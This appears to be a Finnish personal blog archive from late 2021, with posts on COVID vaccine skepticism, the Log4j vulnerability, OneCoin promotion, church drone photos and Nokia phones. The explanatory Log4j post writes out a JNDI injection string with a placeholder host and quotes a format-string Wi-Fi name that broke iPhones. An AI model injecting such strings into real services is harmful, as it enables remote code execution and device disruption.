sunnuntai 19. joulukuuta 2021

Korona on epäluottamuksen epidemia - minulla on oikeus sairastua koronaan!

Omikron-muunnos on kääntänyt koronaennusteet jälleen synkiksi ja se näkyy nettikeskusteluissa. Valtaosa vastustajista näyttää olevan äskettäin perustettuja nimimerkkejä, joilla on vain muutama kymmenen seuraajaa. Helsingin Sanomien juttu kertoi, miten sanavalinnat ja argumentit ovat tuontitavaraa Saksasta, ja sinne niitä uitetaan Venäjältä. Rokotevastaisuus ja vapausretoriikka tulevat ulkomailta. Ei ihme, että rokotepassin yhteydessä vedotaan natseihin ja Nürnbergin oikeudenkäyntiin.

On hyvä, että aiheesta keskustellaan, kunhan keskustelu perustuu joko faktoihin tai aitoihin tunteisiin. Ikävä kyllä moni levittää joko tarkoituksella tai tahattomasti valheita ja disinformaatiota. Sitten on niitäkin, jotka muuttavat mielipiteitään niin, että saavat tykkäyksiä ja näkyvyyttä, joskus jopa nostetta omalle bisnekselle tai poliittiselle uralle. 

Osa laukoo mitä tahansa mielipiteitä ajatustensa ja kannattajiensa tueksi miettimättä niitä lainkaan. Tehohoidon lisääminen rokotusten sijaan on kaikkien pöhköimmästä päästä. 

Aivan kuin nämä ihmiset huutaisivat "Lisää tehohoitopaikkoja! Minulla on oikeus sairastua koronaan ja joutua teholle!"

Pitääkö suomalaisella olla oikeus sairastua koronaan ja valtiolla velvollisuus parantaa hänet siitä? Unohtaen sen inhmillisen kärsimyksen, jota sairaalaan tai teho-osastolle joutumisesta seuraa, on järkevää panostaa kaikki mahdollinen ennaltaehkäisyyn. Kukaan ei halua sairastua oman vakaumuksensa vuoksi, vaikka ei siihen kuolisikaan.

Internetin rajattomien tietovarastojen piti tehdä ihmisistä fiksumpia. Jostain syystä se on tehnyt meistä entistä helpommin johdateltavia ja manipuloitavia. Kriittinen ajattelu on aina hyväksi, mutta "do your own research" ei toteutu katsomalla lisää harrastelijoiden tekemiä Youtube-videoita.

Koronasta näyttää tulleen yhteiskunnallinen epäluottamuksen epidemia. Koulutetut ihmiset ottavat rokotteita ja noudattavat ohjeita paremmin kuin vähän koulutetut. Lääkärit ovat rokottaneet itsensä, perushoitajissa kattavuus on huomattavasti matalampi.

Ajatusleikkinä mietin, millainen Suomi jäisi jäljelle, jos rokotetut kuolisivat viiden vuoden päästä vakaviin komplikaatioihin. Mitenkähän jäljelle jääneet pyörittäisivät maata keskenään?

Olen yrittänyt keskustella koronaepäilijöiden kanssa selvittääkseni heidän ajatteluaan. Olen saanut lähinnä lapsellisia väitteitä siitä, miten lääketehtaat lahjovat poliitikkoja ja maksimoivat voittojaan. Eri mieltä olevia löytyy aina, mutta miksi uskoa 1 % epäilijöitä jos 99 % lääkäreistä ja asiantuntijoista on rokotteen kannalla ja ottaa sen itsekin?

Mietitäänpä hetki, mikä voisi kaikkien rokotteita valmistavien lääketehtaiden salaliiton motiivina. Tehtaat hyötyvät siitä, että ihmiset elävät vanhoiksi, jolloin heille ehtii myydä enemmän lääkkeitä. Pandemian pitkittäminen haittaa maailmataloutta ja epävarmuus laskee niin pörssikursseja kuin voittojakin. Pitkittäminen tai maapallon ihmisten vähentäminen ei voi olla yhdenkään yrityksen tavoite, koska se olisi yksinkertaisesti huonoa bisnestä.

Koskaan ei silti kannata hirttäytyä yhteen totuuteen, ei edes korona-asiassa. Tässä koettelemuksessa on nähty jo niin monta käännettä, että mitä vain voi vielä tapahtua.

sunnuntai 12. joulukuuta 2021

Esimakua kyberpandemiasta

Turvallisuusalalla on pitkään spekuloitu kyberpandemian mahdollisuudella. Heräämmekö jonain päivänä maailmaan, jossa tietomurrot tai haittaohjelmat riivaavat kaikkia järjestelmiä saaden yhteiskunnan ja kansalaisten arjen sekaisin?

Tänä viikonloppuna on saatu esimakua kyberpandemiasta. Syynä on Log4j-niminen Java-komponentti, jota käytetään monissa nettipalveluissa. Ohjelmassa on ominaisuus, joka mahdollistaa yksinkertaisen hyökkäyksen: välittämällä palveluun yksinkertainen merkkijono palvelin saadaan hakemaan mistä tahansa nettiosoitteesta koodia, joka suoritetaan saman tien. 

Haavoittuvuuksia on ollut aina, mutta Log4j on omaa luokkaansa. Sitä ei ole turhaan sanottu vuosisadan pahimmaksi tietoturva-aukoksi. Kyseessä ei ole varsinainen bugi, vaan pikemminkin suunnitteluvirhe, jota kukaan ei ole tiettävästi aiemmin huomannut käyttää hyödyksi.

Aiempi OpenSSL-haavoittuvuus, suomalaisten löytämä Heartbleed (2014), vaikutti laajalle ja havahdutti huomaamaan avoimen lähdekoodin ongelmat. Sen hyödyntäminen oli kuitenkin hankalaa ja vaati teknistä osaamista. Log4j on aivan toista maata: riittää, että vaihtaa selaimen tai puhelimen merkkijonoksi ${jndi:ldap://url-osoite-tähän/a} ja kertoo, mistä osoitteesta hyökkäyskoodi haetaan. Lapsikin sen osaa. Jopa tämä blogiteksti saattaa laukaista koodin hakuyrityksen, joskin url-osoite-tähän on osoitteena vaaraton.

Hieman vastaavia ongelmia on ollut aiemminkin iPhone-puhelimissa. Kesällä uutisoitiin, miten iPhonen verkkoasetukset hajoavat, jos puhelimella liittyy %p%s%s%s%s%n -nimiseen wifi-verkkoon. Edes puhelimen uudelleenkäynnistys ei auta. Aiemmin puhelimen on voinut sammuttaa lisäämällä tekstiviestiin tietyn merkkiyhdistelmän.

Nyt Log4j:n vaarallinen ominaisuus on korjattu, mutta korjausten asentaminen kaikkiin haavoittuviin järjestelmiin on jättimäinen työ. Kyse ei ole pelkistä nettipalveluista, vaan Log4j-komponenttia on tavattu myös erilaisista elektroniikkalaitteista. Suurin osa palveluista ei edes tiedä, että jossain koneiston uumenissa on haavoittuva palanen. Se selviää vain kokeilemalla, miten palvelu vastaa hakkerointiyritykseen.

Täsä Githubin listasta saa jonkinlaisen aavistuksen ongelman laajuudesta. 

Nykyiset tietojärjestelmät koostuvat sadoista komponenteista, joista suurin osa on nettiyhteisön kehittämiä tai ylläpitämiä. Niitä pinotaan päällekkäin ja rinnakkain ilman, että kukaan tietää, mitä haavoittuvuuksia pinoon jää. "Avoin lähdekoodi on turvallista, koska kuka tahansa voi nähdä virheet" on vanha mantra, joka ei pidä enää paikkaansa. 

Kaikki käyttävät vapaita ohjelmia -- toisten kirjoittamaa koodia -- eikä kukaan vastaa kokonaisuudesta. Kriittistä koodia saattaa ylläpitää joku yksittäinen henkilö oman työnsä ohella, tai sitten sitä ei ylläpidä enää kukaan. Log4j:n ylläpidosta huolehtii tiettävästi kolme tai neljä henkilöä, ja hekin vain vapaa-ajan projektina. Silti miljoonat ihmiset ja laitteet käyttävät heidän ilmaistyötään.

Tapahtuma herättää kysymään, millaisia pommeja nettipalveluissa piilee? Kuka löytää ne ensimmäisenä - rosvot, tiedustelupalvelut vai valkohattuhakkerit? Tämä viikonloppu ainakin on IT-ylläpidon painajainen. Luultavasti ensi viikolla tulemme näkemään monia tietomurtoja ja vahingontekoja. Joululomat on peruttu muiltakin kuin teho-osaston hoitajilta.

On ollut kiinnostavaa seurata Suomen uutisointia asiasta. Maailmalla Log4j on iso uutinen, "internet is on fire!". Suomessa sen ovat noteeranneet Ilta-Sanomat, Iltalehti ja Helsingin Sanomat. Yle ei vielä tähän mennessä ole reagoinut. It-maailmaa ymmärtäviä toimittajia on vähän, eikä heitä ole viikonloppuisin vuorossa. Tivi-lehti kirjoitti asiasta jo perjantaina, jolloin vakavuudesta ei ollut vielä täyttä selvyyttä. Tilanteen vaarallisuus on paljastunut vasta viikonlopun kuluessa. 

Voi vain toivoa, että jos kyberpandemia joskus iskee, se ei ala ainakaan viikonloppuna.

Lisäys 14.12.2021: Vaaralliseksi osoittautunut ominaisuus lisättiin Apache Log4j-komponenttiin versiossa 2.0-beta9, joka julkaistiin 21.9.2013. Vaara huomattiin yli kahdeksan vuotta myöhemmin ja varoitus julkaistiin 9.12.2021. Siinä välissä kukaan ei huomannut asiaa tai ei ainakaan raportoinut siitä vaan käytti aukkoa itse tietomurtoihin. Mitähän muita pommeja järjestelmissä tikittää? 

JNDI injection -riskistä oli esitelmä Black Hat 2016 -konferenssissa, mutta puhujat eivät itsekään osanneet yhdistää uhkaa Apache Strutsiin. 

Nyt huolestuttavin skenaario on, että joku kirjoittaa haavoittuvuutta hyödyntävän madon. Se voisi levitä palvelimesta toiseen ja halvaannuttaa ison osan internetiä.

maanantai 6. joulukuuta 2021

Vuorinen: Cryptocurrency ONE is doing better than ever - Now totally new era is starting!!!

Itsenäisyyspäivän kunniaksi muistamme, että suomalaiset ovat sisukkaita. Joskus olisi kuitenkin viisaampaa luovuttaa ja lopettaa pään hakkaaminen seinään. Paraskaan sisu ei pysty muuttamaan faktoja.

Tommi Vuorinen on taas aktivoinut ja kiertää eri puolilla Suomea järjestämässä Onecoin-markkinointitilaisuuksia. Tuoreella englanninkielisellä videolla Vuorinen sanoo tekevänsä "restart" Onecoinille Suomessa. Olen saanut kuvia ja kommentteja mm. Jyväskylästä, Seinäjoelta, Turusta ja Helsingistä. Uskomatonta kyllä, ABC-asemilla järjestettäviin tilaisuuksiin riittää vieläkin osallistujia. Maailmaa mullistava finanssivallankumous on palannut huoltoasemille!

Voiko Suomessa olla vielä ihmisiä, jotka uskovat Vuorisen lupauksia tulevaisuuden kryptovaluutasta? Vuorinen on kansainvälisistä Onecoin-promoottoreista ainoa, joka soittaa edelleen samaa levyä. Muut alusta lähtien mukana olleet ovat nostaneet kytkintä, osa miljoonien kera. Tommi Vuorinen on ainoa, joka jatkaa sisukkaasti kuolleen verkostomarkkinointihuijauksen tekohengitystä.

"Today we have Ethereum based blockchain..."

En tarkalleen tiedä, mitä Vuorinen nykyään lupailee. Ytimessä on edelleen mielikuvitusvaluutta Onecoin, jolla on 42,43 euron mielikuvitusarvo. Painopistettä on kuitenkin siirretty OneEcosystemiin, jonka pitäisi toimia mielikuvitusvaluuttaa käyttävänä globaalina kauppapaikkana. 

Jos tunnet jonkun, joka on käynyt Vuorisen uusissa tilaisuuksissa, kysypä mitä siellä on lupailtu ja miten lupaukset on otettu vastaan. Värväystilaisuuksia ei mainosteta avoimesti, joten niihin on vaikea päästä mukaan.

Mitä ikinä Onecoiniin liittyen luvataankin, siihen ei kannata luottaa. Vaikka Onecoinilla vihdoin olisi oikea, Ethereumin sisällä toimiva lohkoketju, se ei anna valuutalle minkäänlaista arvoa. Laskujeni mukaan kyseessä olisi jo neljäs lohkoketju, kolme ensimmäistä ovat osoittautuneet valheiksi. Lohkoketjun vaihtaminen uuteen romuttaa koko kryptovaluutan idean, joka perustuu juuri lohkoketjun luotettavuuteen ja muuttumattomuuteen.

Miksi neljäs lohkoketju olisi aiempia todellisempi? Vaikka neljäs kerta sanoisi toden, mistä Onecoineille syntyisi minkäänlaista arvoa, kun vaihtopörssiä ei ole? Leikkirahan käyttö sisäisellä kauppapaikalla on puhdasta pelleilyä. Jo aiemmissa ketjuissa on ollut kymmeniä miljardeja kolikkoja ja lisää luodaan koko ajan. 

Vuorinen Turun ABC-asemalla.

Kymmeniä miljardeja kolikkoja ja jokainen niistä 42,43 euron arvoisia? Ihan varmasti. Onecoinin markkinahinta on nolla euroa ja laskee edelleen lisääntyvien kolikkojen myötä. Bitcoinin arvo on Vuorisen aikana seitsemässä vuodessa noussut noin 220-kertaiseksi, vaikka Vuorinen kehui Onecoinin olevan parempi kuin Bitcoin. Onecoiniin sijoittaneet ovat menettäneet rahansa. 

Netissä osui silmiini Vuorisen englanninkielinen videokeskustelu brittiläisen Tabita Omamogho -nimisen henkilön kanssa ("Tabita HolisticFit"). Vuorinen kertasi Onecoinin syntyhistorian, että oli mukana alusta (elokuusta 2014) lähtien, tapasi Veskan ja Konstantinin, osallistui Rujan 35-vuotispäiville 31.5.2015 ja on jatkanut siitä lähtien ainoana Onecoin-sanoman levittämistä.

Tommi Vuorinen lupaa ensi vuodeksi Onecoin-tsunamin, kun toiminta käynnistyy uudelleen.

Vuorisen mukaan ensi vuodesta tulee oikea tsunami, kun kaikki palaset asettuvat paikoilleen. On uusi Ethereum-pohjainen lohkoketju ja kaikki. On jopa tekeillä "legal opinion" suuren suomalaisen asianajotoimiston kanssa - sen haluan nähdä! Saksalainen alkuperäisen legal opinion laatija Breidenbach on itse vastaamassa oikeudessa.

"Nyt on paras hetki tulla mukaan, yhtiö on ratkaissut kaikki ongelmansa!" hän hehkuttaa videon lopuksi Tabitalle, joka on jo valmiiksi uskossa ja intoa täynnä. "En ole lähdössä mihinkään, pysyn täällä kuin kallio (rock)", hän lupaa Tabitalle.

Tabita on vaikuttunut Tommin puheista, koska tämä on ollut mukana alusta lähtien.

On vaikea ymmärtää, miksi Suomen viranomaiset katsovat edelleen poispäin ja antavat Vuorisen touhuta vapaasti. Jo yksin vanhat valheet ja petetyt lupaukset riittäisivät rikossyytteiden nostamiseen.

Voit katsoa Vuorisen ja Omamoghon keskustelun Youtubesta, johon joku on sen siirtänyt.

keskiviikko 1. joulukuuta 2021

Numerot kertovat koronarokotuksen tehosta, ei tehottomuudesta

Olen yrittänyt seurata rokotevastaisten ja koronan vakavuutta vähättelevien kirjoittelua sosiaalisessa mediassa ymmärtääkseni, millaisia perusteluita he käyttävät epäilyksilleen. Yleensä perustelut ovat puhtaasti psykologisia - muiden on helppo lietsoa pelkoa ja epäilyksiä argumenteilla, jotka eivät kestä lähempää tarkastelua. Tässä yksi esimerkki. 

Milla Tiuni (ei selvästikään oikea nimi) julkaisi Twitterissä listan, kuinka moni sairalaahoitoon viikon aikana tulleista potilaista on saanut koronarokotuksen.

Rokotettujen osuus hoidettavista nousee, rokote ei siis toimi?

Oletan, että lista on aito, vaikka eihän sitä voi tietää. Luvuissa on viikkokohtaisesti kappalemäärä ja kauttaviivan jälkeen prosenttiosuus kyseisestä viikosta. Viimeinen rivi 22-28.11. kertoo, että sairaalaan on otettu 15 rokottamatonta ja 14 kahdesti rokotettua, jopa yksi kolmasti rokotettu. 

Ensi katsomalta luvut ovat tylyjä: viikko viikolta yhä suurempi osa sairaalaan joutuvista on saanut molemmat rokotteet! Viimeisellä rivillä rokotettuja on jo puolet kaikista.

Mutta ei tilastoa näin lueta. Mitä suuremmaksi rokotekattavuus nousee, sitä suuremmaksi nousee myös rokotettujen osuus kaikista tartunnoista. Jos kattavuus on jonain päivänä 100 %, silloin kaikki sairastuneet ovat rokotettuja ja voi jopa väittää, että rokote suorastaan aiheuttaa terveysongelmia.

Päinvastoin kuin "Milla Tiuni" ymmärsi, taulukko kertoo rokotuksen hyödyistä. Jos rokotekattavuus on 80 % ja rokote olisi tehoton, potilaiden tulisi jakautua samassa suhteessa 20/80. Jako on kuitenkin 50/50, eli rokotus vähentää riskin neljäsosaan.  

Lisäksi kahdesti ja kolmasti rokotetuissa on keskimääräistä enemmän yli 60-vuotiaita ja perussairaita, jotka muutenkin ovat alttiimpia joutumaan sairaalaan viruksen iskiessä. Riskiryhmät rokotettiin ensimmäisten joukossa. Jos rokote aiheuttaisi haittaa, se näkyisi ylikuolleisuutena.

Vielä yksi vääristymä: taulukko ei kerro mitään oireiden vakavuudesta eikä paranemisajasta. Todennäköisesti rokottamattomat oireilevat vahvemmin ja pidempään kuin rokotetut. 

Tilasto, jonka piti osoittaa rokotteiden tehottomuus, osoittaa siis täysin päinvastaista - kunhan sitä vain tulkitsee oikein eikä mene suoraan painamaan Jaa-nappia.

Rokotettujakin sairastuu eikä mikään rokote estä 100-prosenttisesti tartuntoja. Miksi ottaa rokote, jos se ei poista riskiä kokonaan?

Miksi käyttää turvavöitä, vaikka kolareissa edelleen kuolee ihmisiä? Itse asiassa vyön käyttäjiä kuolee hieman enemmän kuin käyttämättömiä. Silti kukaan ei kuvittele, että vyön käyttämättömyys parantaisi selviämismahdollisuuksia kolarin sattuessa. 

Turvavyö toimii kuten rokotus: se vähentää loukaantumisen riskiä kolarin sattuessa. Vyötä kannattaa käyttää, vaikka olisi itse taitava kuljettaja ja vakavan onnettomuuden riski on hyvin pieni. 

Harvinaisissa tapauksissa turvavyö voi pahentaa vammoja. Joissakin tieltäsuistumistapauksissa vyötön matkustaja olisi sinkoutunut autosta ulos ja pelastunut, mutta vöihin sidottuna on menehtynyt esimerkiksi auton päädyttyä katolleen. Siitä huolimatta laki määrää vöiden käytön pakolliseksi. Mikään turvatekniikka ei ole sataprosenttinen.

Ja pakkoon ollaan menossa rokotustenkin suhteen eräissä Keski-Euroopan maissa.

lauantai 27. marraskuuta 2021

Suomen kirkot drone-ilmakuvissa (tai ainakin 200 ensimmäistä)

Olen kiertänyt vuosina 2020 ja 2021 kuvaamassa Etelä-Suomen kirkkoja dronella. Nyt kasassa on 200 kirkkoa, tavoitteena vähintään tuplata määrä tulevina kesinä. 

Ensimmäiset 54 kirkkoa.

Wikipedian listan mukaan luterilaisia kirkkoja on Suomessa noin 800. Lista on kuten Wikipedia muutenkin, harrastajien ahkeraa työtä, mutta ei virheetön. Esimerkiksi Kauniaisten kirkko puuttuu listalta. 

Miksi kuvata kirkkoja? Olisin voinut valita kuvauskohteeksi jotain muutakin, mutta mitä? Koulut, kirjastot tai kunnantalot ovat paljon uudempia ja yleensä tylsiä.K irkot kertovat Suomen historiasta ja herättävät ajattelemaan historiaa. 

800 kirkkoa köyhässä ja vähäväkisessä maassa tuntuu paljolta. Rakentajat ovat käyttäneet aikaa ja resursseja, joita olisi voitu hyödyntää myös tuon ajan köyhyyden ja kurjuuden poistamiseen. Ilmeisesti aikalaiset kuitenkin katsoivat, että kirkkojen rakentaminen kannattaa. Kirkot antoivat ihmisille yhteisen tavoitteen ja uskoa tulevaisuuteen, kun nälänhädät, sodat ja taudit koettelivat kansakunnan selkärankaa. Voin vain kuvitella, millaista turvallisuuden ja jatkuvuuden tunnetta esi-isämme saivat astuessaan kivikirkkoon, kun tavalliset asumukset olivat tuskin vajaa kummempia.

Kirkot ovat kiinnostavia myös siksi, että ne sijaitsevat usein kauniilla paikalla vesistöjen äärellä (kuten Lappajärven kirkko) tai kukkulan päällä (kuten Nummen kirkko). Kirkkokansa on soutanut paikalle ja kirkonkellot ovat kuuluneet kauaksi. Ehkä kaikkia ei olisi huvittanut lähteä lepopäivänä kirkkoon, mutta kirkko oli myös aikansa sosiaalinen media, jossa päivitettiin kuulumiset ja tavattiin muita. Kirkot kertovat myös talouden muutoksista. Joillakin pienillä paikkakunnilla on suhteettoman suuria ja hienoja kirkkoja, kenties muistona entisaikojen vauraudesta.

200 ensimmäistä kuvattua kirkkoa kartalla.

Vieraalla paikkakunnalla ohikulkija vain vilkaisee kirkkoja eikä pane merkille niiden rakenteita. Ilmakuvasta kaikki näkyy uudesta perspektiivistä. Olen ällistynyt, miten monimuotoisia suomalaiset kirkot ovat. Ensimmäisten 200 joukkoon on osunut monia ilahduttavia yllätyksiä, kuten Helsingin Östersundomin pieni puukirkko, Rajamäen hieno funkkisrakennus, moderni Joutjärven kirkko Lahdessa sekä Karkun kirkon erikoiset muodot, Keski-Loimaan italialaistyylinen kupolikirkko, Tampereen Viinikan kirkon sisäpiha ja Köyliön kirkko saaressa. Yläneen kirkko on maasta katsottuna vaikuttava näky, Huhtamon kirkko aivan laajan suon reunassa ja huonon tien päästä mäeltä, puiden keskeltä löytynyt Kuivannon kirkko oli yllätys sekin.

Varsinkin pääkaupunkiseudulla ja Tampereella on runsaasti moderneja kirkkoja, jotka edustavat ihan erilaista ajattelua. Kalevan kirkko on komea, Kannelmäessä on mielenkiintoinen suippomalli ja Hyvinkään kolmiorakenne muistuttaa laskeutunutta Star Wars -alusta. Useimmat ovat kuitenkin varsin tylsiä. Tampereen Hervannassa kirkko on niin tylsä, ettei sitä tunnistaisi kirkoksi ilman tekstiä Hervannan kirkko rakennuksen kyljessä. Jossain määrin tylsiä bongauskohteita ovat myös vanhat 1400-luvun kivikirkot, sillä ulospäin ne ovat kuin samalla muotilla tehtyjä. Niiden sijainnin keskittyminen rannikkoseudulle ja Hämeenlinnan lähistöön kertoo historiasta.

Kirkkojen bongaaminen on avannut uuden ikkunan myös kotimaan maisemiin. Olen aina ajellut pikkuteitä ja kuvannut maisemia, mutta kirkkojen mukaan suunnistaminen on vienyt ihan uusille kylille, joista moni on kesä- ja syysaikaan hämmästyttänyt kauneudellaan.

Moni kirkko on tänä vuonna ollut rakennustelineiden peitossa. Korjausvelka kasvaa koko ajan, eikä kaikilla seurakunnilla riitä niihin varaa. Kun kirkosta eronneiden määrä kasvaa, seurakuntien tulot pienenevät ja kirkkoja joudutaan jopa sulkemaan. Jokelan kirkkoa oltiin syksyllä 2021 jo purkamassa (ja sitten joku varasti sen kellot). 

Kirkkojen lisäksi niitä ympäröivät hautausmaat ovat tutustumisen arvoisia. Niillä kävellessä omat deadlinet ja projektiaikataulut menettävät merkityksensä. Erityisen pysäyttävä näky oli Östersundomin hautausmaalla. Lähekkäin on kaksi hautaa, joista toisessa on 4,5-vuotiaana kuollut Ines Wiktoria Melander ja toisessa 104-vuotiaana kuollut Märtha Elisabet Synnöve Blomqvist. Toisen elämä päättyi jo ennen kuin se ehti alkaakaan, toinen sai sata vuotta enemmän.

Jatkan kirkkojen kuvaamista ensi vuonna. Voit seurata projektin etenemistä kirkkokuvien sivulta https://petterij.kuvat.fi/kuvat/Kirkot/.

Nokian legendaarisia puhelimia

Kaivoin kokoelmastani muutamia legendaarisia Nokian puhelinmalleja, jotka 1990-luvulla ja 2000-luvun alkuvuosina olivat maailmanluokan julkistuksia.

Nokia 1011.

Nokia 1011 oli yhtiön ensimmäinen GSM-malli ja se julkistettiin 10.11.1992. Puhelin oli iso ja kömpelö. Ensimmäisillä versioilla pystyi vain vastaanottamaan tekstiviestejä, joita siihen aikaan ajateltiin operaattorien tiedotuskanavaksi. Näitä puhelimia on nykyisin vaikea löytää, tämä on ainoa löytämäni kappale. Todellista Nokia-historiaa, siis. Vuonna 1996 julkistettu 1610 näyttää samanlaiselta, mutta on selvästi pienempi ja kaikin puolin eri laite. Alkuperäisen 1011:n tunnistaa 45 asteen kulmassa olevista kaiutinaukon ritilästä. 

Nokia 2110, 1011 ja Communicator 9000.

Nokia 2110 (vasemmalla, 1994) oli monen ensimmäinen GSM-puhelin. Ryhmäkuvassa 1011 ja Nokia Communicator 9000 (1996), ns. kenkäpuhelin. Communicator oli aikanaan mullistava laite, sillä se yhdisti 386-tietokoneen ja puhelimen samoihin kuoriin.

Nokia 7110 (Wap-malli).

WAP-tekniikan piti tuoda ns. lisäarvopalvelut puhelimiin. Maksullisten palvelujen kautta pystyi lataamaan esimerkiksi taustakuvia ja soittoääniä. WAP oli kuitenkin kömpelö ja aika ajoi nopeasti sen ohi nettiyhteyksien tullessa puhelimiin. Kuvan Nokia 7110 -puhelin (1999) oli omassa käytössäni vuosituhannen vaihteessa. Samantapainen malli esiintyy myös Matrix-elokuvassa, mutta kyse on ns. elokuvapuhelimesta, joka ei koskaan ollut tuotantomalli. 

Nokia 7650

Tänään kamera puhelimessa on itsestäänselvyys, mutta aikoinaan niin ei ollut. Nokia 7650 oli valmistajan ensimmäinen kamerapuhelin vuodelta 2002.

Nokia N-Gage ja N-Gage QD pelipuhelimet.

Nokia näki mobiilipelien merkityksen jo 2003 julkistaessaan ensimmäisen pelipuhelimen. N-Gage tuli sanasta "engage". Pelit asennettiin rom-moduleina puhelimen sisään. Mikrofoni ja kaiutin olivat laitteen reunassa, joten sillä piti puhua poikittaisessa asennossa, mikä herätti aikoinaan suurta hilpeyttä ("side talking"). Ylärivissä kaksi alkuperäistä N-Gagea, toinen niistä omani, jonka ostin vuonna 2005 poistomyynnistä. Se oli silloin halvin älypuhelin, johon pystyi lataamaan sovelluksia. Uudempi QD-malli (2004) paransi alkuperäistä ideaa. Nokia oli aikaansa edellä, mutta myyntimenestyksiä ei tullut kummastakaan. 

Nokia E71, E72, E63 ja E5.

Nokian perus-bisnesmalleja olivat E71 ja E72, joissa numeronäppäimistö oli upotettu muun näppäimistön keskelle. Käyttö vaati sorminnäppäryyttä. Vasemmalla oleva E71 palveli pitkään omassa käytössäni

Nokia 7280, 7380 ja 7600.

Nokian erikoisimmat mallit samassa kuvassa. Nokia 7280 (2004) oli art deco -sarjan ns. huulipunamalli, josta haluttiin tehdä tyylitietoisen muotivalinta. Puhelimen käyttöliittymä perustuu pyöritettävään kiekkoon - ei kovin käytännöllistä! Siinä on myös kamera, jonka objektiivi tulee esiin kun laitetta vedetään auki. Kokeilun jälkeen on pakko uskoa, että kyllä se toimii. Puhelimen näyttö toimii myös peilinä, josta huulipunan kohennusta on helppo seurata. Olisiko moinen design tänään seksististä vai saisiko se kehuja? Mene ja tiedä.

Nokia 7380 (2005) oli parannettu versio. Nokia 7600 oli ihan oma lukunsa. Erikoinen muotoilu sopii hyvin kämmenelle, mutta numeroiden valinta näytön ympäriltä oli vaikeaa.

Kaikki ovat suhteellisen harvinaisia, mutta olen onnistunut löytämään kolme toimivaa 7600-mallia ja myös toimivat 7280- ja 7380-mallit.

Nokia 3650 ja 3660.

Toinen muotoilukokeilu oli Nokia 3650 (2003) pyöreä näppäimistö, joka ei kuitenkaan miellyttänyt kaikkia ostajia. Seuraavassa Nokia 3660 (2003) pyöreys säilyi, mutta näppäinjärjestys oli taas perinteinen.

Nokia 7610.

Tyylikkääseen 7-alkuiseen design-sarjaan kuuluivat myös nämä 7610-mallit (2004).

Nokia 7210 ja Nokia 7250.

Lisää tyylikästä 7-sarjaa: Nokia 7210 (2002) ja Nokia 7250 (2003). 

Nokia 5110.

Vuonna 1998 julkistettu Nokia 5110 oli suosittu peruspuhelin vuosituhannen vaihteessa. Sitä myytiin yli 30 miljoonaa kappaletta. Puhelin oli saatavilla monen eri värisenä.

Nokia 6500C, 5310 XpressMusic ja 6700S.

Applen iPod löi läpi mp3-soittimena, joten Nokia kehitti monia vastaavia malleja. Ne olivat kauniita kuin korut ja toimivat tietenkin myös puhelimina.

Nokia Communicator -malleja

Communicatorista tuli useita malleja.

Nokia N93

Nokia N93 (2006) herätti aikoinaan huomiota innovatiivisella muotoilullaan. Näytön pystyi kääntämään eri asentoihin ja se toimi myös pystymallisena videokamerana. Siinä oli jopa kolminkertainen optinen zoomi. 

Nokia 8810 Limited Edition ns. Zippo.

Yksi ikonisista malleista on 8810 (1998), joka pienenä ja metallisena muistutti tunnettua Zippo-sytytintä. Kirkas metalli oli kaunis, mutta sormenjäljet ja naarmut näkyivät turhan hyvin.  

8810 ja takakanteen kiinnitetty akku.

Tämä on vieläkin haluttu laite, etenkin jos akku toimii. Se onkin ongelma, sillä 8810:ssa akku on kiinni takakannessa, eikä uusia taida enää saada mistään.

Näppäinsuoja avattuna.

Seuraava 8850-malli oli samanlainen, mutta harmaapintainen. Se pysyi pystyssä ja värinähälytyksen ollessa käytössä se pyöri pöydällä pystyakselinsa ympäri. Siihen eivät nykypuhelimet pysty.

Pienistä puhelimesta puheenollen - valitetaan, että nykypuhelimet ovat liian isoja ja suunniteltu miehen isoon käteen. Pieniäkin malleja on ollut, mutta ne eivät enää mene kaupaksi.

Nokia 8210 oli aikansa minipuhelin.

Pariisilaisessa muotinäytöksessä vuonna 1999 esitelty Nokia 8210 oli aikansa pienin puhelin, paino vain 79 grammaa. Vaihdettavien värikuorten ansiosta se sopi arkeen ja juhlaan, aina asusteen mukaan.

Nokian hienoimmat mallit: Arte 8800.

Oi, nämä olivat Nokian hienoimpia malleja. Arte 8800 luksus-sarjassa oli useita puhelimia, tässä kuvassa Gold (2009) ja 8900. Puhelimet edustivat aikansa hienointa tekniikkaa. Näppäimistö on liukukannen alla, joka liikkuu laakereiden varassa. Puhelin painaa paljon ja on kädessä vaikuttavan oloinen. Arte 8800 -sarjan malleista maksetaan vieläkin satoja euroja.

Nokia E7.

Syksyllä 2010 esitelty Nokia E7 oli konseptina mainio. Tavanomainen pystypuhelin kääntyi vaakaan ja paljasti oikean näppäimistön. 

Nokia E7 näppäimistö avattuna.

Tällainen konsepti tuntuisi voittajalta vielä tänäkin päivänä, harmi ettei mikään tunnettu Android-valmistaja ole hoksannut samaa.

Nokia N9 ja Lumia 830.

Nokia N9 (2011) oli ainoaksi jäänyt Meego-malli. Sen piti pelastaa Nokia Symbianin jälkeiseen aikaan, mutta oli jo myöhäistä. Nokia ei enää pystynyt luomaan uutta ekosysteemiä, koska iPhone ja Android olivat jo niin vahvoja. Taustalla näkyvä Lumia 830 (2014) on ulkoisesti liki identtinen N9:n kanssa, mutta käyttöjärjestelmänä oli jo epäonninen Windows Phone.

tiistai 23. marraskuuta 2021

Nokia oli matkapuhelinyhtiö - puhelimet in memoriam

Olli-Pekka Kallasvuo julkaisi syksyllä kirjan Nokia-ajastaan nimellä "Puhelin soi öisin". Tv-haastattelussa hän tiivisti yhtiön vaikeudet matkapuhelimissa yksinkertaiseen lauseeseen: Nokia oli matkapuhelinyhtiö. En voisi olla enemmän samaa mieltä. Nokia huomasi, että uudet puhelimet myivät aina, joten se julkisti vähän toisistaan poikkeavia malleja koko ajan. Niiden tukeminen ja softien ylläpito kävi painajaiseksi, eikä lopulta mikään toiminut hyvin. Applella on myynnissä kerralla seitsemän erilaista puhelinta, mikä tekee tuoteperheen hallinnasta oleellisesti helpompaa. 

Jorma Ollila selitti muistelmissaan epäonnistumista sillä, ettei Suomessa ja Nokialla ollut riittävästi ohjelmisto-osaamista, ja että Suomi oli kaukana Piilaaksossa, jossa Google ja Apple kehittivät omat älypuhelimensa. Osaamista ei ollut, koska sitä ei hankittu ajoissa. Nokialla oli konttori myös Piilaaksossa ja maailman johtavana valmistajana se olisi voinut houkutella ketä tahansa osaajia palvelukseensa. 

